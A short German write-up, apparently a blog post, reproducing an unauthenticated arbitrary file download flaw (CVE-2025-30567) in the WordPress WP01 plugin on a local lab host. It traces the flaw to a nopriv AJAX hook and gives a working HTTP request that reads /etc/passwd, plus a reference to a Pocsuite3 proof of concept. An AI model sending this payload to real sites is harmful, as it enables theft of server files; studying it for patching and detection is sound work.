
Unbefugter beliebiger Dateidownload in WordPress WP01
Unberechtigter beliebiger Datei-Download in WordPress WP01!
Schritt 1: WP01 Plugin herunterladen, aber...

Haha, keine Sorge, hier ist der Quellcode des Plugins.
Schritt 2: Packen Sie den bereitgestellten wp01-Ordner und laden Sie ihn in den WordPress-Plugins-Bereich hoch. wie folgt -->

Es ist einfach – die Schwachstelle wird an folgender Stelle ausgelöst:

Als nächstes prüfen Sie, wo die make_archive-Methode aufgerufen wird.

Es gibt zwei AJAX-Aktions-Hooks – einen für angemeldete Benutzer und einen für nicht angemeldete Benutzer. Dies ist der Grund für die Schwachstelle des nicht autorisierten Zugriffs.
Alles klar, jetzt erstellen wir das Payload, um den Inhalt von /etc/passwd auf dem lokalen Rechner zu lesen.
POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
Host: 192.168.43.133
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cb_lang=zh-cn; PHPSESSID=8b29e9ec5200189ba7e72e98d4c6d017; WS_ADMIN_URL=ws://192.168.43.133/notice; WS_CHAT_URL=ws://192.168.43.133/msg; wordpress_test_cookie=WP%20Cookie%20check; XDEBUG_SESSION=PHPSTORM; wp01-lang=en; wp_lang=en_US
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
target=passwd&path=/etc/
Ergebnisse:


OK, als nächstes laden Sie diese wp-01-passwd.zip-Datei herunter.

Geschrieben basierend auf Pocsuite3, siehe Poc_CVE-2025-30567.py für Details.
